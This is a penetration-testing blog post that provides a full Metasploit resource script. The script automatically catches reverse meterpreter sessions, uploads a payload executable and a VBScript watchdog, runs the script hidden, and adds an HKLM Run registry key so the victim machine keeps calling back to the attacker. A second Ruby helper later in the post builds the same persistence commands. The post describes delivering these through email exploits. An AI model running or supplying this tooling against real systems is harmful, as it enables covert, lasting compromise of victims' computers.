Channel: OMGSecurity » pentest

Automated Persistence with .RC scripts


A while back I did a post about persistent meterpreter: a way to make the compromised system continually attempt a reverse connection back to the Metasploit multi/handler listener. Recently I was on a pentest engagement where I wanted to do some social engineering attacks over email, using a combination of the IE Aurora vulnerability and the PDF embedded EXE vulnerability.

So I needed a way to launch my multi/handler and have it automatically set up persistence once a client connected. There is a persistence.rb meterpreter script written by darkoperator in the Metasploit Framework repository, but it is an interactive script that you run inside an existing meterpreter session. I needed something that required no interaction, so with a little borrowed code from a Ruby block example I mashed up this script.


#
# Script to automatically install a meterpreter/reverse_tcp payload and a VBS script for persistent connection to attacker.
#
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 1.2.3.4
set ExitOnSession false
#
exploit -j
#
# Everything between the <ruby> and </ruby> tags is evaluated by msfconsole as Ruby
# (the tags are part of the .rc syntax and must be present). framework and
# print_status are available inside the block.
#
# The first sleep below is not necessary, but makes the output cleaner
#
<ruby>
sleep(1)
print_status("Waiting on incoming sessions...")
# This loop runs until msfconsole is interrupted (Ctrl-C); the commands after
# </ruby> only run if the loop is given a break condition.
while (true)
  # Iterate over a copy of the session table, since s.kill removes entries from it
  framework.sessions.to_a.each do |sid, s|
    # Only meterpreter sessions have s.ext; skip anything else that connects
    next unless s.type == 'meterpreter'
    thost = s.tunnel_peer.split(":")[0]
    # Ensure that stdapi has been loaded before running
    if s.ext.aliases['stdapi']
      sleep(1)
      print_status("Uploading files to session #{sid} #{thost}...")
      # The console splits each line with shell-style quoting, so an unquoted
      # backslash has to arrive doubled: "\\\\" in this Ruby literal is "\\" on
      # the line and "\" after splitting.
      s.console.run_single("upload reverse.exe persist.vbs C:\\\\WINDOWS\\\\Temp")
      print_status("Executing persistent script...")
      # Inside single quotes the console keeps backslashes as they are, so one
      # Ruby-escaped backslash ("\\") per separator is enough here.
      s.console.run_single("execute -H -f 'cmd.exe /c cscript C:\\WINDOWS\\Temp\\persist.vbs'")
      print_status("Creating Registry Key...")
      s.console.run_single("reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v msfpersist -d 'C:\\WINDOWS\\Temp\\persist.vbs'")
      s.console.run_single("reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v msfpersist")
      print_status("Closing session #{sid} #{thost}...")
      s.kill
    else
      print_status("Session #{sid} #{thost} active, but not yet configured")
    end
  end
  sleep(1)
end
print_status("All done")
</ruby>
#
# Kill all open sessions
sessions -K
#
# Exit the console (optional)
exit

Some lines wrapped in this post, so you can download the script at the end. Basically you want to set LHOST and LPORT to the address and port of the machine running the listener. "reverse.exe" is the payload executable (built for the same payload, LHOST and LPORT as the handler), and "persist.vbs" is the VBScript that runs on the victim machine and launches reverse.exe if it is not already running. Both files need to be in the working directory msfconsole was started from (upload resolves local paths relative to it), or the path needs to be specified.
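As an added example (not the author's script and not Metasploit's own code), here is a Ruby helper that builds the same four console lines with Shellwords, which is what the meterpreter console uses to split a line (Rex::Parser::Arguments.from_s wraps it), so the backslash escaping that makes the block above hard to read is handled by the library and can be checked offline. The file names, the target directory and the registry value name are assumed to match the post; a recording stand-in replaces the real session so the file runs without msfconsole.

```ruby
require 'shellwords'

# Build one meterpreter console line from its arguments. The console splits
# a line with Ruby's Shellwords, so joining with Shellwords.join guarantees
# that every backslash and space survives the round trip, and no hand-counting
# of backslashes inside string literals is needed.
def met_cmd(*args)
  Shellwords.join(args)
end

# What the meterpreter console will see after it splits the line.
def met_parse(line)
  Shellwords.split(line)
end

# The persistence install as a list of console lines. File names, target
# directory and value name are assumptions for this example; the Run key is
# the standard per-machine autostart key.
def persistence_commands(exe: 'reverse.exe', vbs: 'persist.vbs',
                         dir: 'C:\WINDOWS\Temp', value: 'msfpersist')
  run_key  = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
  vbs_path = "#{dir}\\#{vbs}"
  [
    met_cmd('upload', exe, vbs, dir),
    # Launch the watchdog script through cscript; -H keeps the window hidden
    met_cmd('execute', '-H', '-f', 'cscript.exe', '-a', vbs_path),
    # Autostart entry, then read it back so the output shows it was written
    met_cmd('reg', 'setval', '-k', run_key, '-v', value, '-d', vbs_path),
    met_cmd('reg', 'queryval', '-k', run_key, '-v', value),
  ]
end

# Send the sequence through a session, which is what the <ruby> block of the
# .rc file does for each new session. `session` only needs to expose
# session.console.run_single, as Msf::Sessions::Meterpreter does.
# Returns the lines that were sent.
def install_persistence(session, **opts)
  persistence_commands(**opts).each { |line| session.console.run_single(line) }
end

# Stand-in for a session so the file can be exercised without msfconsole:
# it records every line instead of executing it.
class RecordingSession
  attr_reader :lines
  def initialize; @lines = []; end
  def console; self; end
  def run_single(line); @lines << line; end
end

if __FILE__ == $0
  s = RecordingSession.new
  install_persistence(s)
  s.lines.each do |line|
    puts "sent   : #{line}"
    puts "parsed : #{met_parse(line).inspect}"
  end
end
```

Inside the <ruby> block of the .rc file this replaces the four run_single lines with a single install_persistence(s). Running the file on its own prints each line as sent and as the console will split it, which is a quick way to confirm a path survived before pointing the handler at a real target.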

You invoke this script by the following:

./msfconsole -r autopersist.rc

This script could be refined quite a bit, but it accomplished what I needed. If anyone has suggestions, feel free to comment.

Download: autopersist.vbs

MD5 checksum: 453bbd3e5b95ee1045431bbe2f92c118

